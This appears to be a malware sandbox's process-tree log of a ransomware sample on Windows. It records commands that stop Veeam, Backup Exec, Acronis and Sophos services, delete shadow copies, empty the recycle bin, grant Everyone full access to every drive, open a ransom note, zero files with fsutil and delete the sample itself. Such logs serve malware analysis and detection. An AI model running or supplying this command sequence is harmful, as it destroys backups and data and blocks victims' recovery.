C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:1612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:324
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:1064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:1524
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵PID:1376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:1380
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:1816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:1828
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:1784
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:1516
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:1624
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:1256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:1600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:1568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:1908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:1900
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:1972
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:1100
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:1200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:1488
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:1084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:1612
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1616
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:1068
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1092
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1380
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1852
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1324
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1000
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1936
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1116
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:780
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:744
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1212
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:520
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1624
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1632
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2028
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:212
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1556
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1044
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1508
-
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1524
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:1848
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1600
-
-
C:\Windows\system32\icacls.exe"icacls.exe" A:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:608
-
-
C:\Windows\system32\icacls.exe"icacls.exe" B:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\system32\icacls.exe"icacls.exe" D:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1040
-
-
C:\Windows\system32\icacls.exe"icacls.exe" E:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:872
-
-
C:\Windows\system32\icacls.exe"icacls.exe" F:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1612
-
-
C:\Windows\system32\icacls.exe"icacls.exe" G:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1504
-
-
C:\Windows\system32\icacls.exe"icacls.exe" H:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1804
-
-
C:\Windows\system32\icacls.exe"icacls.exe" I:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1828
-
-
C:\Windows\system32\icacls.exe"icacls.exe" J:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1932
-
-
C:\Windows\system32\icacls.exe"icacls.exe" K:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\system32\icacls.exe"icacls.exe" L:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\system32\icacls.exe"icacls.exe" M:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:748
-
-
C:\Windows\system32\icacls.exe"icacls.exe" N:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1080
-
-
C:\Windows\system32\icacls.exe"icacls.exe" O:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\system32\icacls.exe"icacls.exe" P:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1056
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Q:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1544
-
-
C:\Windows\system32\icacls.exe"icacls.exe" R:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\icacls.exe"icacls.exe" S:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\system32\icacls.exe"icacls.exe" T:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1292
-
-
C:\Windows\system32\icacls.exe"icacls.exe" U:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:632
-
-
C:\Windows\system32\icacls.exe"icacls.exe" V:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\system32\icacls.exe"icacls.exe" W:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\system32\icacls.exe"icacls.exe" X:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1308
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Y:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Z:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1208
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1008
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1104
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:872
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:324
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1292
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:364
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1104
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe2⤵
- Deletes itself
PID:324 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2012
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2004
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1764
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1896